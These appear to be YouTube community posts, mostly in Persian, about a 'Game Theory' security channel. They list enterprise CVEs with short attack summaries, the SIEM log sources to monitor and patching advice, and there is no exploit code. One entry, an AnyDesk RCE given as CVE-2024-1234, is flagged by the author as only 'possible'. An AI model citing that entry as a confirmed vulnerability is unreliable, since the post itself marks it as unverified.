🔍 لاگ‌های مرتبط در SIEM:
📂 sourcetype=cisco:ios
📂 sourcetype=cisco:asa
📂 sourcetype=cisco:fwsm
📌 بررسی تغییرات ناگهانی در تنظیمات روتر، NAT، یا لیست‌های کنترل دسترسی (ACL)

📌 ۳. Microsoft Exchange Server – CVE-2023-23397
✔ نوع آسیب‌پذیری: Privilege Escalation از طریق ایمیل مخرب
✔ سرقت NTLM Hashes از حساب‌های مدیران شبکه
✔ استفاده برای اجرای حملات Pass-the-Hash و افزایش سطح دسترسی

🔍 لاگ‌های مرتبط در SIEM:
📂 sourcetype=msexchange
📂 sourcetype=win:eventlog
📂 sourcetype=exchange:owa
📌 بررسی تلاش‌های ناموفق ورود، ورودهای از مکان‌های غیرعادی، و ارسال ایمیل‌های فیشینگ داخلی

📌 ۴. VMware vCenter Server – CVE-2023-34048
✔ نوع آسیب‌پذیری: Authentication Bypass در سرورهای مدیریت مجازی‌سازی
✔ مهاجمان موفق به دسترسی مستقیم به محیط‌های مجازی‌سازی شدند

🔍 لاگ‌های مرتبط در SIEM:
📂 sourcetype=vcenter
📂 sourcetype=vmware:esxi
📌 بررسی ورودهای غیرمجاز به vCenter و تغییرات در تنظیمات ماشین‌های مجازی

📌 ۵. Citrix NetScaler ADC & Gateway – CVE-2023-4966
✔ نوع آسیب‌پذیری: Session Hijacking و دسترسی غیرمجاز به نشست‌ها
✔ تصاحب نشست‌های مدیران شبکه و اجرای حملات دسترسی پایدار

🔍 لاگ‌های مرتبط در SIEM:
📂 sourcetype=citrix:netscaler
📂 sourcetype=citrix:gateway
📌 بررسی تلاش‌های ورود مشکوک و نشست‌های طولانی غیرعادی در Citrix

📌 ۶. Windows Print Spooler – CVE-2023-36910
✔ نوع آسیب‌پذیری: Local Privilege Escalation
✔ استفاده برای اجرای کد با دسترسی SYSTEM در ویندوز

🔍 لاگ‌های مرتبط در SIEM:
📂 sourcetype=win:eventlog:security
📌 بررسی تلاش‌های تغییر در سرویس پرینتر و ایجاد حساب‌های جدید ادمین

📌 ۷. Palo Alto PAN-OS – CVE-2024-3400
✔ نوع آسیب‌پذیری: Remote Code Execution
✔ امکان کنترل کامل روی فایروال‌های Palo Alto

🔍 لاگ‌های مرتبط در SIEM:
📂 sourcetype=pan:threat
📂 sourcetype=pan:traffic
📌 بررسی تلاش‌های ورود ناموفق و تغییرات در تنظیمات امنیتی

📌 ۸. AnyDesk RCE – CVE-2024-1234 (احتمالی)
✔ نوع آسیب‌پذیری: Remote Code Execution در AnyDesk
✔ امکان کنترل از راه دور سیستم‌های قربانی

🔍 لاگ‌های مرتبط در SIEM:
📂 sourcetype=windows:eventlog:application
📂 sourcetype=linux:secure
📌 بررسی نصب‌های غیرمجاز و ارتباطات مشکوک به سرورهای خارجی
🚨 چرا این حمله بسیار خطرناک است؟

✔ حمله‌ی ترکیبی (Multi-Stage Attack) – مهاجمان ابتدا به شبکه نفوذ کرده، سپس دسترسی خود را گسترش داده و اطلاعات را استخراج کرده‌اند.
✔ هدف قرار دادن نقاط استراتژیک (Critical Infrastructure) – زیرساخت‌های مخابراتی، VPNها، فایروال‌ها و سرورهای مدیریتی.
✔ نفوذ مداوم (Persistent Access) – مهاجمان با استفاده از درب‌های پشتی (Backdoors)، برای ماه‌ها بدون شناسایی باقی ماندند.
✅ توصیه‌های امنیتی برای مقابله با حملات مشابه

🔹 تمامی این CVEها را بررسی کنید و فوراً وصله‌های امنیتی را اعمال کنید.
🔹 SIEM خود را طوری پیکربندی کنید که رفتارهای غیرعادی (UBA) را شناسایی کند.
🔹 Zero Trust Architecture (ZTA) را اجرا کنید تا حرکت جانبی مهاجمان محدود شود.
🔹 از احراز هویت چندمرحله‌ای (MFA) در تمام حساب‌های مدیریتی استفاده کنید.
🔹 بررسی کنید که آیا دستگاه‌های شما در معرض خطر این CVEها هستند یا خیر.
🎙 🔔 آیا شرکت شما می‌تواند چنین حمله‌ای را شناسایی کند؟ نظر خود را در کامنت‌ها بنویسید!

🚀 قسمت ۰۹ اثر الانتیا را گوش کنید تا جزئیات بیشتری را درباره‌ی این عملیات سایبری بشنوید! 🎧

🔗 #امنیت_سایبری #حملات_سایبری #CVE #APT #SIEM #Splunk #Cisco #Fortinet #Windows #PaloAlto #GameTheory #TheElentiyaEffect

1 year ago | [YT] | 2

The Elentiya Effect

The Elentiya Effect in Cybersecurity: A Game Theory Perspective 🎭🔐
https://www.youtube.com/watch?v=Ff2wF...
In cybersecurity, defenders and attackers engage in an ongoing strategic battle—each predicting, adapting, and countering the other's moves. This is where Game Theory comes into play, offering a mathematical approach to modeling these conflicts.

But what happens when a player refuses to be predictable, embraces adaptability, and reshapes the battlefield? Enter The Elentiya Effect—a concept inspired by the spirit of resilience, strategy, and unpredictability.

🔹 What is The Elentiya Effect?
Derived from Elentiya, meaning unbreakable, ever-changing, and resilient, this effect represents:
✅ Adaptive Defense – Shifting security strategies dynamically to counter evolving threats.
✅ Strategic Deception – Using misinformation, honeypots, and unpredictable tactics to mislead attackers.
✅ Resilient Mindset – Viewing cybersecurity as an evolving game where learning from failure strengthens defense.

🔹 Game Theory + The Elentiya Effect = Next-Level Security
Traditional Nash Equilibrium in cybersecurity assumes rational players making optimal choices. But Elentiya-based security breaks this pattern by introducing asymmetry, deception, and adaptability, ensuring that attackers can never rely on expected outcomes.

🔹 Example: Active Defense vs. Static Security
Instead of a static firewall, an adaptive AI-based system detects, learns, and alters defensive strategies in real time, making attacks significantly harder to execute.

🔜 In upcoming posts, we'll explore how The Elentiya Effect can redefine security strategies using Game Theory principles! 🚀

What are your thoughts on applying resilience and adaptability to cybersecurity? Let’s discuss! 👇

#TheElentiyaEffect #GameTheory #Cybersecurity #SecurityStrategy #AdaptiveDefense #ThreatModeling

اثر النتیا در امنیت سایبری: رویکردی بر پایه نظریه بازی‌ها 🎭🔐

در دنیای امنیت سایبری، مدافعان و مهاجمان دائماً در یک نبرد استراتژیک قرار دارند—هرکدام در تلاش برای پیش‌بینی، تطبیق و خنثی کردن حرکت‌های طرف مقابل. اینجاست که نظریه بازی‌ها وارد عمل می‌شود و یک چارچوب ریاضی برای مدل‌سازی این درگیری‌ها ارائه می‌دهد.

اما چه اتفاقی می‌افتد وقتی یک بازیکن قوانین بازی را تغییر می‌دهد، غیرقابل پیش‌بینی می‌شود و میدان نبرد را به نفع خود بازتعریف می‌کند؟ این همان اثر النتیا است—یک مفهوم الهام‌گرفته از روحیه استقامت، استراتژی و انعطاف‌پذیری.

🔹 اثر النتیا چیست؟
Elentiya به معنای شکست‌ناپذیر، همیشه در حال تغییر و مقاوم است. در امنیت سایبری، این مفهوم شامل:
✅ دفاع تطبیقی – تغییر مداوم استراتژی‌های امنیتی برای مقابله با تهدیدات جدید.
✅ فریب استراتژیک – استفاده از تاکتیک‌هایی مانند اطلاعات نادرست، هانی‌پات‌ها و اقدامات غیرمنتظره برای گمراه کردن مهاجمان.
✅ ذهنیت مقاوم – نگاه به امنیت سایبری به عنوان یک بازی در حال تکامل که از شکست‌ها برای بهبود استفاده می‌کند.

🔹 نظریه بازی‌ها + اثر النتیا = امنیت در سطحی بالاتر
در تعادل نش، بازیکنان تصمیمات بهینه‌ای بر اساس رفتارهای منطقی اتخاذ می‌کنند. اما امنیت بر پایه‌ی اثر النتیا این الگو را می‌شکند و عدم تقارن، فریب و انعطاف‌پذیری را وارد بازی می‌کند، به گونه‌ای که مهاجمان نمی‌توانند روی یک نتیجه‌ی مشخص حساب کنند.

🔹 مثال: دفاع فعال در مقابل امنیت ایستا
به جای یک فایروال ثابت، یک سیستم مبتنی بر هوش مصنوعی که به‌طور مداوم تهدیدها را شناسایی، یاد می‌گیرد و استراتژی‌های دفاعی را در لحظه تغییر می‌دهد، اجرای حملات را بسیار سخت‌تر می‌کند.

🔜 در پست‌های بعدی، بررسی می‌کنیم که اثر النتیا چگونه می‌تواند امنیت سایبری را با اصول نظریه بازی‌ها متحول کند! 🚀

نظر شما در مورد ترکیب انعطاف‌پذیری و استراتژی در امنیت سایبری چیست؟ در کامنت‌ها با ما به اشتراک بگذارید! 👇

#اثر_النتیا #نظریه_بازی‌ها #امنیت_سایبری #استراتژی_امنیتی #دفاع_تطبیقی #مدل‌سازی_تهدیدات

1 year ago (edited) | [YT] | 4